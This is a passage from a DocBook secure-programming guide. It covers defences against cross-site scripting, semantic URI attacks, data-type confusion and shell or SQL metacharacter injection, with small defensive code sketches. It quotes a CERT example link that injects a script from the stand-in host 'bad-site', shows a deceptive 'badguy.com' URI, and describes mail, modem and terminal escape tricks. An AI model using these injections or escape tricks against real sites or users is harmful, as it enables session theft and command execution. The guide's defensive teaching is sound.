may even be able to trick users into revealing sensitive information
(by modifying the behavior of an existing form).
Or, by embedding scripts, an intruder can cause no end of problems.
This is by no means an exhaustive list of problems, but
hopefully this is enough to convince you that this is a serious problem.
</para>

<para>
Most ``discussion boards'' have already discovered this problem,
and most already take steps to prevent it in text intended to be part of
a multiperson discussion.
Unfortunately, many web application developers don't
realize that this is a much more general problem.
<emphasis>Every</emphasis> data value that is sent from one
user to another can potentially be a source for cross-site
malicious posting, even if it's not an ``obvious'' case of an area
where arbitrary HTML is expected.
The malicious data can even be supplied by the user himself, since the
user may have been fooled into supplying the data via another site.
Here's an example (from CERT) of an HTML link that causes the user to
send malicious data to another site:
<programlisting>
 &lt;A HREF="http://example.com/comment.cgi?mycomment=&lt;SCRIPT
 SRC='http://bad-site/badfile'&gt;&lt;/SCRIPT&gt;"&gt; Click here&lt;/A&gt;
</programlisting>
</para>

<para>
In short, a web application cannot accept input (including any form data)
without checking, filtering, or encoding it.
You can't even pass that data back to the same user in many cases
in web applications, since another user may have surreptitiously
supplied the data.
Even if permitting such material won't hurt your system, it will
enable your system to be a conduit of attacks to your users.
Even worse, those attacks will appear to be coming from your system.
</para>

<para>
CERT describes the problem this way in their advisory:
<blockquote><para>
A web site may inadvertently include malicious HTML tags or script
in a dynamically generated page based on unvalidated input
from untrustworthy sources
(<ulink url="http://www.cert.org/advisories/CA-2000-02.html">CERT Advisory
CA-2000-02, Malicious HTML Tags Embedded in Client Web Requests</ulink>).
</para></blockquote>
More information from CERT about this is available at
<ulink url="http://www.cert.org/archive/pdf/cross_site_scripting.pdf">
http://www.cert.org/archive/pdf/cross_site_scripting.pdf</ulink>.
</para>
</sect2>

<sect2 id="solutions-cross-site">
<title>Solutions to Cross-Site Malicious Content</title>
<para>
Fundamentally, this means that all web application output impacted
by any user must be
filtered (so characters that can cause this problem are removed),
encoded (so the characters that can cause this problem are encoded in
a way to prevent the problem), or
validated (to ensure that only ``safe'' data gets through).
This includes all output derived from
input such as URL parameters, form data, cookies,
database queries, CORBA ORB results, and data from users stored in files.
In many cases,
filtering and validation should be done at the input, but
encoding can be done during either input validation or output generation.
If you're just passing the data through without analysis, it's probably
better to encode the data on input (so it won't be forgotten).
However, if your program processes the data,
it can be easier to encode it on output instead.
CERT recommends that filtering and encoding be done during data output;
this isn't a bad idea, but there are many cases where it makes sense to do it
at input instead.
The critical issue is to make sure that you cover all cases for
every output, which is not an easy thing to do regardless of approach.
</para>

<para>
Warning - in many cases these techniques can be subverted unless you've also
gained control over the character encoding of the output.
Otherwise, an attacker could use an ``unexpected'' character encoding
to subvert the techniques discussed here.
Thankfully, this isn't hard;
gaining control over output character encoding is discussed in
<xref linkend="output-character-encoding">.
</para>

<para>
One minor defense that's often worth using is the "HttpOnly" flag for
cookies.
Scripts that run in a web browser cannot access cookie values
that have the HttpOnly flag set (they just get an empty value instead).
This is currently implemented in
Microsoft Internet Explorer, and I expect
Mozilla/Netscape to implement this soon too.
<!-- http://online.securityfocus.com/archive/1/299331/2002-11-09/2002-11-15/0 -->
<!-- http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dncode/html/secure10102002.asp -->
You should set HttpOnly on any cookie you send, unless you have
scripts that need the cookie, to counter certain kinds of cross-site
scripting (XSS) attacks.
However, the HttpOnly flag can be circumvented in a variety of ways,
so using it as your primary defense is inappropriate.
Instead, it's a helpful secondary defense that may help save you in
case your application is written incorrectly.
<!-- See http://www.whitehatsec.com/news.html
  http://www.extremetech.com/article2/0,3973,841047,00.asp
  and the Bugtraq discussion, 23 Jan 2003.
-->
</para>
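
<para>
As an illustration, here is a minimal Python sketch that builds a
cookie with the HttpOnly flag set, using the standard http.cookies
module.
The cookie name ``session'' and the function name
session_cookie_header are hypothetical:
<programlisting>
from http.cookies import SimpleCookie

def session_cookie_header(session_id):
    """Build a Set-Cookie header value with the HttpOnly flag set."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["path"] = "/"
    # header="" drops the leading "Set-Cookie:" so that only the
    # header value is returned.
    return cookie.output(header="").strip()
</programlisting>
The returned value should include ``HttpOnly'' among the cookie's
attributes; send it in a Set-Cookie header.
</para>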

<para>
The first subsection below discusses how to identify special
characters that need to be filtered, encoded, or validated.
This is followed by subsections describing
how to filter or encode these characters.
There's no subsection discussing how to validate data in general;
however, for input validation in general see <xref linkend="input">,
and if the input is straight HTML text or a URI, see
<xref linkend="filter-html">.
Also note that your web application can receive malicious cross-postings,
so non-queries should forbid the GET protocol
(see <xref linkend="avoid-get-non-queries">).
</para>

<sect3>
<title>Identifying Special Characters</title>
<para>
Here are the special characters for a variety of circumstances
(my thanks to the CERT, who developed this list):

<itemizedlist>
<listitem><para>
In the content of a block-level element (e.g.,
in the middle of a paragraph of text in HTML or a block in XML):
 <itemizedlist>
 <listitem><para>"&lt;" is special because it introduces a tag.</para></listitem>
 <listitem><para>"&amp;" is special because it introduces a character entity.</para></listitem>
 <listitem><para>"&gt;" is special because some browsers treat it as special,
on the assumption that the author of the page really meant
to put in an opening "&lt;", but omitted it in error.</para></listitem>
 </itemizedlist>
</para></listitem>

<listitem><para>
In attribute values:
<itemizedlist>
<listitem><para>In attribute values enclosed with double quotes, the
double quotes are special because they mark the end of the attribute value.
</para></listitem>
<listitem><para>In attribute values enclosed with single quotes, the single
quotes are special because they mark the end of the attribute value.
XML's definition allows single quotes, but I've been told that some
XML parsers don't handle them correctly, so you might avoid
using single quotes in XML.
<!--
The CERT advisory at
  http://www.cert.org/tech_tips/malicious_code_mitigation.html
once said they weren't legal; Daniel Naber noted that
this sentence isn't there now:

"Note that these aren't legal in XML, so I would recommend not using these."
-->
</para></listitem>
<listitem><para>Attribute values without any quotes make the white-space
characters such as space and tab special.
Note that unquoted attribute values aren't legal in XML, <emphasis>and</emphasis>
they make more characters special.
Thus, I recommend against unquoted attributes if you're using
dynamically generated values in them.
</para></listitem>
<listitem><para>"&amp;" is special when used in conjunction with
some attributes because it introduces a character entity.
</para></listitem>
</itemizedlist>
</para></listitem>

<listitem><para>
In URLs, for example, a search engine might provide a link within
the results page that the user can click to re-run the search. This
can be implemented by encoding the search query inside the URL. When
this is done, it introduces additional special characters:
<itemizedlist>
<listitem><para>
Space, tab, and new line are special because they mark the
end of the URL.
</para></listitem>
<listitem><para>
        "&amp;" is special because it introduces a character
        entity or separates CGI parameters.
</para></listitem>
<listitem><para>
        Non-ASCII characters (that is, everything above 127 in the
        ISO-8859-1 encoding) aren't allowed in URLs, so they are all
        special here.
</para></listitem>
<listitem><para>
        The "%" must be filtered from input anywhere parameters
        encoded with HTTP escape sequences are decoded by server-side
        code. The percent must be filtered if input such as
        "%68%65%6C%6C%6F" becomes "hello" when it appears on the web
        page in question.
</para></listitem>
</itemizedlist>
</para></listitem>

<listitem><para>
Within the body of a &lt;SCRIPT&gt; &lt;/SCRIPT&gt;
        the semicolon, parentheses, curly braces, and new line
        should be filtered in situations where text could be inserted
        directly into a preexisting script tag.
</para></listitem>

<listitem><para>
        Server-side scripts that convert any exclamation
        characters (!) in input to double-quote characters (") on
        output might require additional filtering.
</para></listitem>
</itemizedlist>
</para>

<para>
Note that, in general, the ampersand (&amp;) is special in HTML and XML.
</para>

</sect3>

<sect3>
<title>Filtering</title>
<para>
One approach to handling these special characters is simply
eliminating them (usually during input or output).
</para>

<para>
If you're already validating your input for valid characters
(and you generally should), this is easily done by simply omitting the
special characters from the list of valid characters.
Here's an example in Perl of a filter that only accepts legal
characters, and since the filter doesn't accept any special characters
other than the space, it's quite acceptable for use in areas such as
a quoted attribute:
<programlisting>
 # Accept only legal characters:
 $summary =~ tr/A-Za-z0-9\ \.\://dc;
</programlisting>
</para>

<para>
However, if you really want to strip away <emphasis>only</emphasis>
the smallest number of characters, then you could create a subroutine
to remove just those characters:
<programlisting>
 sub remove_special_chars {
  my ($s) = @_;   # lexical copy of the argument
  # Delete every character on the special-character list:
  $s =~ s/[\&lt;\&gt;\"\'\%\;\(\)\&amp;\+]//g;
  return $s;
 }
 # Sample use:
 $data = remove_special_chars($data);
</programlisting>
</para>
</sect3>

<sect3>
<title>Encoding (Quoting)</title>
<para>
An alternative to removing the special characters is to encode them
so that they don't have any special meaning.
This has several advantages over filtering the characters;
in particular, it prevents data loss.
If the data is "mangled" by the process from the user's point of view,
at least when the data is encoded it's possible to reconstruct the
data that was originally sent.
</para>

<para>
HTML, XML, and SGML all use the ampersand ("&amp;") character as a
way to introduce encodings in the running text; this encoding
is often called ``HTML encoding.''
To encode these characters, simply transform the special characters
in your circumstance. Usually this means
'&lt;' becomes '&amp;lt;',
'&gt;' becomes '&amp;gt;',
'&amp;' becomes '&amp;amp;', and
'&quot;' becomes '&amp;quot;'.
As noted above, although in theory '&gt;' doesn't need to be quoted,
because some browsers act on it (and fill in a '&lt;') it needs to be quoted.
There's a minor complexity with the double-quote character,
because '&amp;quot;' only needs to be
used inside attributes, and some extremely old browsers don't
properly render it.
If you can handle the additional complexity, you can try to encode '&quot;'
only when you need to, but it's easier to simply encode it and ask
users to upgrade their browsers.
Few users will use such ancient browsers, and the double-quote character
encoding has been a standard for a long time.
</para>
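
<para>
As a minimal sketch of this encoding in Python, the standard html
module already provides the transformation; the wrapper name
encode_html is hypothetical.
Note that with quote=True, html.escape also encodes the single quote
(as a numeric character reference), which goes slightly beyond the four
characters listed above:
<programlisting>
import html

def encode_html(text):
    """Encode less-than, greater-than, ampersand, and both quote
    characters so that they lose their special meaning in HTML."""
    return html.escape(text, quote=True)
</programlisting>
With this sketch, the text ``T&amp;C'' would come out as
``T&amp;amp;C''.
</para>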

<para>
Implementers of scripting languages may want to consider specialized
auto-quoting types, an interesting approach developed in the web
application framework
<ulink url="http://www.mems-exchange.org/software/quixote">Quixote</ulink>.
Quixote includes a "template" feature which allows easy mixing of HTML text
and Python code; text generated by a template is passed back to the web browser
as an HTML document.
As of version 0.6, Quixote has two kinds of text (instead of a single
kind as in most such languages).
Anything which appears in a literal, quoted string is of type "htmltext,"
and it is assumed to be exactly as the programmer wanted it to be
(this is reasonable, since the programmer wrote it).
Anything which takes the form of an ordinary Python string, however,
is automatically quoted as the template is executed.
As a result, text from a database or other external source is
automatically quoted, and cannot be used for a cross-site scripting attack.
Thus, Quixote implements a safe default -
programmers no longer need to worry about quoting every bit of text
that passes through the application (bugs involving too much quoting
are less likely to be a security problem, and will be obvious in testing).
Quixote uses an open source software license (though, because of its
venue identification, it is probably GPL-incompatible), and it is used by
organizations such as the
<ulink url="http://lwn.net">Linux Weekly News</ulink>.
<!-- See http://lwn.net/Articles/19552/ -->
</para>
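
<para>
To make the auto-quoting idea concrete, here is a minimal Python
sketch.
This is <emphasis>not</emphasis> Quixote's actual implementation or API;
the names HtmlText and render are hypothetical, and the sketch only
illustrates the general technique of marking trusted markup with a
distinct type and encoding everything else by default:
<programlisting>
import html

class HtmlText(str):
    """Marks a string as markup that the programmer wrote and trusts."""

def render(*parts):
    """Join parts, encoding every part not marked as HtmlText."""
    out = []
    for part in parts:
        if isinstance(part, HtmlText):
            # Trusted markup passes through unchanged.
            out.append(str(part))
        else:
            # Anything else is treated as data and encoded.
            out.append(html.escape(str(part), quote=True))
    # The result is itself marked, so it is not encoded a second time.
    return HtmlText("".join(out))
</programlisting>
The design choice here is that forgetting to mark something produces
visibly over-quoted output rather than a security hole.
</para>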

<para>
This approach to HTML encoding
isn't quite enough encoding in some circumstances.
As discussed in <xref linkend="output-character-encoding">,
you need to specify the output character encoding (the ``charset'').
<!-- A list of character encodings is at
    ftp://ftp.isi.edu/in-notes/iana/assignments/character-sets; this
    is referenced in the HTML 4.01 spec -->
If some of your data is encoded using a different character encoding
than the output character encoding, then you'll need to do something so your
output uses a consistent and correct encoding.
Also, if you've selected an output encoding other than
ISO-8859-1, then you need to
make sure that any alternative encodings for special characters
(such as "&lt;") can't slip through to the browser.
This is a problem with several character encodings, including popular ones
like UTF-7 and UTF-8; see <xref linkend="character-encoding">
for more information on how to prevent ``alternative'' encodings of characters.
<!-- Is it possible to slip through even with ISO-8859-1? I don't see
     a way to do it, so I'm not raising that concern. -->
One way to deal with incompatible character encodings is to
first translate the characters internally to ISO 10646 (which has
the same character values as Unicode), and then
use either numeric character references or character entity
references to represent them:
<itemizedlist>
<listitem><para>A numeric character reference looks like
"&amp;#D;", where D is a decimal number, or
"&amp;#xH;" or "&amp;#XH;", where H is a hexadecimal number.
The number given is the ISO 10646 character id (which has the same character
values as Unicode).
Thus &amp;#1048; is the Cyrillic capital letter "I".
The hexadecimal system isn't supported in the SGML standard (ISO 8879),
so I'd suggest using the decimal system for output.
Also, although the SGML specification
permits the trailing semicolon to be omitted in
some circumstances, in practice many systems don't handle it - so
always include the trailing semicolon.
</para></listitem>
<listitem><para>A character entity reference does the same thing but
uses mnemonic names instead of numbers.
For example, "&amp;lt;" represents the &lt; sign.
If you're generating HTML, see the
<ulink url="http://www.w3.org">HTML specification</ulink> which
lists all mnemonic names.
</para></listitem>
</itemizedlist>
Either system (numeric or character entity)
works; I suggest using character entity references for
'&lt;', '&gt;', '&amp;', and '&quot;' because it makes your code (and output)
easier for humans to understand.  Other than that, it's not clear
that one or the other system is uniformly better.
If you expect humans to edit the output by hand later, use the
character entity references where you can, otherwise I'd use the
decimal numeric character references just because they're easier to program.
This encoding scheme can be quite inefficient for some languages
(especially Asian languages); if that is your primary content, you
might choose to use a different character encoding (charset), filter
on the critical characters (e.g., "&lt;")
and ensure that no alternative encodings for critical characters are allowed.
</para>
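
<para>
As a minimal sketch of the decimal numeric character reference
approach, assuming the text has already been decoded into a Python
string (which holds Unicode code points), the following first encodes
the markup characters and then replaces every non-ASCII character.
The function name to_ascii_html is hypothetical:
<programlisting>
import html

def to_ascii_html(text):
    """Encode the markup characters, then replace each non-ASCII
    character with a decimal numeric character reference."""
    encoded = html.escape(text, quote=True)
    # The xmlcharrefreplace error handler emits decimal references.
    return encoded.encode("ascii", "xmlcharrefreplace").decode("ascii")
</programlisting>
With this sketch, the Cyrillic capital letter "I" comes out as
``&amp;#1048;'', with the trailing semicolon included.
</para>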

<para>
URIs have their own encoding scheme, commonly called ``URL encoding.''
In this system, each character not permitted in URLs is represented using
a percent sign followed by its two-digit hexadecimal value.
To handle all of ISO 10646 (Unicode), it's recommended to first translate
the characters to UTF-8, and then encode each resulting byte this way.
See <xref linkend="Validating-uris"> for more about validating URIs.
</para>
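
<para>
Here is a minimal Python sketch of URL encoding a single value (such as
a query parameter), using the standard urllib.parse module, which
translates to UTF-8 before percent-encoding.
The function name url_encode is hypothetical; passing safe="" is a
choice made here so that the slash is encoded too:
<programlisting>
from urllib.parse import quote

def url_encode(text):
    """Percent-encode text as UTF-8; safe="" also encodes the slash."""
    return quote(text, safe="", encoding="utf-8")
</programlisting>
With this sketch, a space becomes ``%20'' and the Cyrillic capital
letter "I" becomes ``%D0%98''.
</para>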


</sect3>

</sect2>

</sect1>

<sect1 id="semantic-attacks">
<title>Foil Semantic Attacks</title>

<para>
A ``semantic attack'' is an attack in which the attacker uses the
computing infrastructure/system in a way that fools the victim into
thinking they are doing one thing when they are actually doing something
different, even though the computing infrastructure/system is working
exactly as it was designed to.
Semantic attacks often involve financial scams, where the attacker is
trying to fool the victim into giving the attacker large sums of money
(e.g., thinking they're investing in something).
For example, the attacker may try to convince the user that they're
looking at a trusted website, even if they aren't.
</para>

<para>
Semantic attacks are difficult to counter, because they're exploiting
the correct operation of the computer.
The way to deal with semantic attacks is to help give the human
additional information, so that when ``odd'' things happen the human
will have more information or a warning will be presented
that something may not be what it appears to be.
</para>

<para>
One example is URIs that, while legitimate, may fool users into
thinking they have a different meaning.
For example, look at this URI:
<programlisting>
  http://www.bloomberg.com@www.badguy.com
</programlisting>
If a user clicked on that URI, they might think that they're going
to Bloomberg (who provide financial commodities news), but instead
they're going to www.badguy.com (and providing the username
www.bloomberg.com, which www.badguy.com will conveniently ignore).
If the badguy.com website then imitated the bloomberg.com site,
a user might be convinced that they're seeing the real thing
(and make investment decisions based on attacker-controlled
information).
This depends on URIs being used in an unusual way - clickable URIs
can have usernames, but usually don't.
One solution for this case is for the web browser to detect such unusual
URIs and create a pop-up confirmation widget, saying
``You are about to log into www.badguy.com as user www.bloomberg.com;
do you wish to proceed?''
If the widget allows the user to change these entries, it provides
additional functionality to the user as well as providing protection
against that attack.
</para>
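
<para>
The detection step can be sketched in a few lines of Python using the
standard urllib.parse module.
This is only an illustration of the check, not how any particular
browser does it, and the function name describe_userinfo is
hypothetical:
<programlisting>
from urllib.parse import urlsplit

def describe_userinfo(uri):
    """Return a warning string if the URI carries a username,
    otherwise None."""
    parts = urlsplit(uri)
    if parts.username is None:
        return None
    return "You are about to log into %s as user %s" % (
        parts.hostname, parts.username)
</programlisting>
For the URI shown above, this sketch reports www.badguy.com as the
host and www.bloomberg.com as the user.
</para>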

<para>
Another example is homographs, particularly international homographs.
Certain letters look similar to each other, and these can be exploited
as well.
For example, since 0 (zero) and O (the letter O) look similar to each
other, users may not realize that WWW.BLOOMBERG.COM and WWW.BL00MBERG.COM
are different web addresses.
Other similar-looking letters include 1 (one) and l (lower-case L).
If international characters are allowed, the situation is worse.
For example, many Cyrillic letters look essentially the same as
Roman letters, but the computer will treat them differently.
Currently most systems don't allow international characters in host names,
but for various good reasons it's widely agreed that support for them
will be necessary in the future.
One proposed solution has been to display letters from different code regions
using different colors - that way,
users get more information visually.
If the users look at the URI, they will hopefully notice the strange coloring
[Gabrilovich 2002].
However, this does show the essence of a semantic attack -
it's difficult to defend against, precisely because the computers are
working correctly.
</para>
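
<para>
A program could apply a similar idea by noticing when the letters in a
name come from more than one code region.
Here is a rough Python sketch; it uses the first word of each letter's
Unicode character name as a stand-in for its script, which is only a
heuristic, and the function names are hypothetical.
Note that it does nothing about look-alikes within one script, such
as zero and the letter O:
<programlisting>
import unicodedata

def letter_scripts(name):
    """Return the set of script names (the first word of each
    letter's Unicode character name) used by the letters in name."""
    scripts = set()
    for ch in name:
        # Digits, dots, and hyphens are ignored; only letters count.
        if ch.isalpha():
            scripts.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return scripts

def looks_mixed(name):
    """True if the letters in name come from more than one script."""
    return len(letter_scripts(name)) not in (0, 1)
</programlisting>
</para>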
</sect1>

<sect1 id="careful-typing">
<title>Be Careful with Data Types</title>

<para>
Be careful with the data types used, in particular those used in
interfaces.
For example, ``signed'' and ``unsigned'' values are treated differently
in many languages (such as C or C++).
<!-- This was the basis of a sysctl() vulnerability -->
</para>
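
<para>
To illustrate the kind of surprise this can cause, here is a small
Python sketch that uses the standard ctypes module to reinterpret a
value as a 32-bit C integer would.
The function names are hypothetical, and the 32-bit width is an
assumption chosen for the example:
<programlisting>
import ctypes

def as_unsigned32(n):
    """Reinterpret n the way a C 32-bit unsigned parameter would."""
    return ctypes.c_uint32(n).value

def as_signed32(n):
    """Reinterpret n the way a C 32-bit signed parameter would."""
    return ctypes.c_int32(n).value
</programlisting>
With these helpers, as_unsigned32(-1) yields 4294967295.
So a length of -1 that passes a signed ``not larger than the limit''
check becomes an enormous length once a routine treats it as unsigned.
</para>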
</sect1>

</chapter>

<chapter id="call-out">
<title>Carefully Call Out to Other Resources</title>

<epigraph>
<attribution>Psalms 146:3 (NIV)</attribution>
<para>
Do not put your trust in princes, in mortal men, who cannot save.
</para>
</epigraph>

<para>
Practically no program is truly self-contained; nearly all programs
call out to other programs for resources, such as programs provided
by the operating system, software libraries, and so on.
Sometimes this calling out to other resources isn't obvious or involves
a great deal of ``hidden'' infrastructure which must be depended on,
e.g., the mechanisms to implement dynamic libraries.
Clearly, you must be careful about which resources your program trusts
and about the way you send requests to them.
</para>

<sect1 id="call-only-safe">
<title>Call Only Safe Library Routines</title>

<para>
Sometimes there is a conflict between security and the development
principles of abstraction (information hiding) and reuse.
The problem is that some high-level library routines
may or may not be implemented securely,
and their specifications won't tell you.
Even if a particular implementation is secure, it may not be
possible to ensure that other versions of the routine
will be safe, or that the same interface will be safe on other platforms.
<!-- I once said:
 For example, I've not been able to assure myself that tmpfile(3) is
 secure on all platforms (see (xref linkend="temporary-files"));
 its specifications aren't sufficiently clear to give me confidence of this.

 However, I've since learned that my fears were justified.
 System V (at least up through 1993) _did_not_ do this safely. -->

</para>

<para>
In the end, if your application must be secure, you must sometimes
re-implement your own versions of library routines.
Basically, you have to re-implement routines if you can't be sure
that the library routines will perform the necessary actions you require
for security.
Yes, in some cases the library's implementation should be fixed, but
it's your users who will be hurt if you choose a library routine that
is a security weakness.
If you can, try to use the high-level interfaces when you must
re-implement something - that way, you can switch to the high-level
interface on systems where its use is secure.
</para>

<para>
If you can, test to see if the routine is secure or not, and use it if
it's secure - ideally you can perform this test as part of
compilation or installation (e.g., as part of an ``autoconf'' script).
For some conditions this kind of run-time testing is impractical, but
for other conditions, this can eliminate many problems.
If you don't want to bother to re-implement the library, at least test
to make sure it's safe and halt installation if it isn't.
That way, users will not accidentally install an insecure program and
will know what the problem is.
</para>
</sect1>

<sect1 id="limit-call-outs">
<title>Limit Call-outs to Valid Values</title>

<para>
Ensure that any call out to another program only permits valid
and expected values for every parameter.
This is more difficult than it sounds, because many
library calls or commands call lower-level routines in potentially
surprising ways.
For example, many library routines are implemented indirectly by
calling the shell, which means that passing characters which are shell
metacharacters can have dangerous effects.
So, let's discuss metacharacters.
</para>
</sect1>

<sect1 id="handle-metacharacters">
<title>Handle Metacharacters</title>

<para>
Many systems, such as the command line shell and SQL interpreters,
have ``metacharacters'', that is, characters in their input
that are not interpreted as data.
Such characters might be commands, or delimit data from commands or other data.
If there's a language specification for that system's interface
that you're using, then it certainly has metacharacters.
If your program invokes those other systems and allows attackers to
insert such metacharacters, the usual result is that an attacker can
completely control your program.
</para>

<para>
One of the most pervasive metacharacter problems involves
shell metacharacters.
The standard Unix-like command shell (stored in /bin/sh)
interprets a number of characters specially.
If these characters are sent to the shell, then their special interpretation
will be used unless escaped; this fact can be used to break programs.
According to the WWW Security FAQ [Stein 1999, Q37], these metacharacters are:

<screen width="61">
&amp; ; ` ' \ " | * ? ~ &#60; &#62; ^ ( ) [ ] { } $ \n \r
</screen>
</para>

<para>
I should note that in many situations you'll also want to escape
the tab and space characters, since they (and the newline) are the default
parameter separators.
The separator values can be changed by setting the IFS environment
variable, but if you can't trust the source of this variable you should
have thrown it out or reset it anyway as part of your environment
variable processing.
</para>

<para>
Unfortunately, in real life this isn't a complete list.
Here are some other characters that can be problematic:
<!-- Martin Douda provided this list of ! through *; I added the note
     about control characters -->
<itemizedlist>
<listitem><para>
'!' means ``not'' in an expression (as it does in C);
    if the return value of a program is tested, prepending !
    could fool a script into thinking something had failed when it
    succeeded or vice versa.
    In some shells, the "!" also accesses the command history, which can
    cause real problems.
    In bash, this only occurs for interactive mode, but tcsh
    (a csh clone found in some Linux distributions) uses "!" even in scripts.
</para></listitem>

<listitem><para>
'#' is the comment character; all further text on the line is ignored.
</para></listitem>

<listitem><para>
'-' can be misinterpreted as leading an option (or, as -&nbsp;-, disabling
all further options).  Even if it's in the ``middle'' of a filename,
if it's preceded by what the shell considers as whitespace you may
have a problem.
</para></listitem>

<listitem><para>
' ' (space), '\t' (tab), '\n' (newline), '\r' (return),
'\v' (vertical space), '\f' (form feed),
and other whitespace characters can have many dangerous effects.
They can turn a ``single'' filename into multiple arguments, for example,
or turn a single parameter into multiple parameters when stored.
Newline and return have a number of additional dangers, for example,
they can be used to create ``spoofed'' log entries in some programs,
or inserted just before a separate command that is then executed
(if an underlying protocol uses newlines or returns as command
separators).
<!--
More details at this Bugtraq posting:
Subject: CRLF Injection
From: Ulf Harnhammar <ulfh@update.uu.se>
Date: Tue, 7 May 2002 00:12:10 +0200 (CEST)
To: bugtraq@securityfocus.com
-->
</para></listitem>

<listitem><para>
Other control characters (in particular, NUL) may cause problems for
some shell implementations.
</para></listitem>

<listitem><para>
Depending on your usage, it's even conceivable that ``.''
(the ``run in current shell'') and ``='' (for setting variables) might
be worrisome characters.
However, any example I've found so far where these
are issues have other (much worse) security problems.
</para></listitem>

<!--
  '.' run in current shell - also could be harmful alloving to modify
    execution environment

  '=' for variables, again modifying execution environment

  (*) depending on programs called from script any other character can cause
  problems.
-->
</itemizedlist>

</para>


<para>
What makes the shell metacharacters particularly pervasive is
that several important library calls, such as popen(3) and system(3),
are implemented by calling the command shell, meaning that they will
be affected by shell metacharacters too.
Similarly, execlp(3) and execvp(3) may cause the shell to be called.
Many guidelines suggest avoiding popen(3), system(3), execlp(3), and execvp(3)
entirely and using execve(2) directly in C when trying to spawn
a process [Galvin 1998b].
At the least, avoid using system(3) when you can use execve(2);
since system(3) uses the shell to expand characters, there is more
opportunity for mischief in system(3).
In a similar manner the Perl and shell backtick (`) also call a command shell;
for more information on Perl see <xref linkend="perl">.
</para>
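
<para>
The following is a minimal sketch of spawning a program with
fork(2) and execve(2) so that no shell ever interprets the arguments.
The function name run_without_shell() is hypothetical, and the sketch
assumes the caller supplies a full path and a deliberately
constructed environment:
</para>

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <errno.h>

/* Run the program at the full path 'path' with argument vector 'argv'
   and environment 'envp', without involving a shell.
   Returns the child's exit status (127 if execve failed),
   or -1 if the child could not be created or did not exit normally. */
int run_without_shell(const char *path, char *const argv[],
                      char *const envp[])
{
    pid_t pid;
    int status;

    pid = fork();
    if (pid < 0)
        return -1;                 /* fork failed */
    if (pid == 0) {
        execve(path, argv, envp);  /* each argv entry stays one argument */
        _exit(127);                /* reached only if execve failed */
    }
    while (waitpid(pid, &status, 0) < 0) {
        if (errno != EINTR)
            return -1;             /* waitpid failed for a real reason */
    }
    if (WIFEXITED(status))
        return WEXITSTATUS(status);
    return -1;                     /* killed by a signal, etc. */
}
```

<para>
Because each element of argv is handed to the new program as-is,
a value such as ``a; exit 9'' arrives as one ordinary argument
rather than being split or executed.
The called program may still interpret its arguments in its own way,
so validating the values remains necessary.
</para>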

<para>
Since SQL also has metacharacters, a similar issue revolves around
calls to SQL.
When an attacker supplies input containing SQL metacharacters in order
to change the meaning of a query, it's often called "SQL injection".
See
<ulink url="http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf">
SPI Dynamic's paper ``SQL Injection: Are your Web Applications Vulnerable?''
</ulink>
for further discussion on this.
As discussed in <xref linkend="input">,
define a very limited pattern and only allow data matching that
pattern to enter; if you limit your pattern to ^[0-9]+$ or
^[0-9A-Za-z]*$ then you won't have a problem.
If you must handle data that may include SQL metacharacters, a good approach
is to convert it (as early as possible) to some other encoding before
storage, e.g.,
HTML encoding (in which case you'll need to encode any ampersand characters
too).
Also, prepend and append a quote to all user input, even
if the data is numeric; that way, insertions of white space and other
kinds of data won't be as dangerous.
</para>

<para>
Forgetting one of these characters can be disastrous; for example,
many programs omit backslash as a shell metacharacter [rfp 1999].
As discussed in <xref linkend="input">, an approach recommended
by some
is to immediately escape at least all of these characters when they are input.
But again, by far and away the best approach is to identify which
characters you wish to permit, and use a filter to only permit
those characters.
</para>
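
<para>
A filter that only permits known-good characters might be sketched
as follows.
The permitted set here (ASCII letters and digits) and the name
is_permitted() are assumptions made for illustration;
a real program would choose the set to suit its own data:
</para>

```c
#include <string.h>

/* Hypothetical set of permitted characters for this sketch. */
static const char PERMITTED[] =
    "abcdefghijklmnopqrstuvwxyz"
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "0123456789";

/* Return 1 if 's' is non-empty and every character in it is in the
   permitted set; return 0 otherwise. */
int is_permitted(const char *s)
{
    size_t len;

    if (s == NULL)
        return 0;
    len = strlen(s);
    if (len == 0)
        return 0;
    /* strspn() counts the leading characters that are in PERMITTED;
       the input is acceptable only if that covers the whole string. */
    return strspn(s, PERMITTED) == len;
}
```

<para>
This rejects anything not explicitly listed, so a forgotten
metacharacter (such as backslash) is rejected by default
instead of being passed through.
</para>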

<para>
A number of programs, especially those designed for human interaction,
have ``escape'' codes that perform ``extra'' activities.
One of the more common (and dangerous) escape codes is one that brings
up a command line.
Make sure that these ``escape'' commands can't be included
(unless you're sure that the specific command is safe).
For example, many line-oriented mail programs (such as mail or mailx) use
tilde (~) as an escape character, which can then be used to send a number
of commands.
As a result, apparently-innocent commands such as
``mail admin < file-from-user'' can be used to execute arbitrary programs.
Interactive programs such as vi, emacs, and ed have ``escape'' mechanisms
that allow users to run arbitrary shell commands from their session.
Always examine the documentation of programs you call to search for
escape mechanisms.
It's best if you call only programs intended for use by other programs; see
<xref linkend="call-intentional-apis">.
</para>

<para>
The issue of avoiding
escape codes even goes down to low-level hardware components
and emulators of them.
Most modems implement the so-called ``Hayes'' command set.
Unless the command set is disabled, inducing
a delay, the phrase ``+++'', and then another delay forces the modem
to interpret any following text as commands to the modem instead.
This can be used to implement denial-of-service attacks (by
sending ``ATH0'', a hang-up command) or even forcing
a user to connect to someone else (a sophisticated attacker could
re-route a user's connection through a machine under the attacker's control).
For the specific case of modems, this is easy to counter
(e.g., add "ATS2=255" in the modem initialization string), but the
general issue still holds: if you're controlling a lower-level component,
or an emulation of one, make sure that you disable or otherwise handle
any escape codes built into them.
</para>

<para>
Many ``terminal'' interfaces implement the escape
codes of ancient, long-gone physical terminals like the VT100.
These codes can be useful, for example, for bolding characters,
changing font color, or moving to a particular location
in a terminal interface.
However, do not allow arbitrary untrusted data to be sent directly
to a terminal screen, because some of those codes can cause serious problems.
On some systems you can remap keys (e.g., so when a user presses
"Enter" or a function key it sends the command you want them to run).
On some you can even send codes to
clear the screen, display a set of commands you'd like the victim to run,
and then send that set ``back'', forcing the victim to run
the commands of the attacker's choosing without even waiting for a keystroke.
This is typically implemented using ``page-mode buffering''.
This security problem is why emulated tty's (represented as device files,
usually in /dev/) should only be writeable by
their owners and never anyone else - they should never have
``other write'' permission set, and unless only the user is a member of
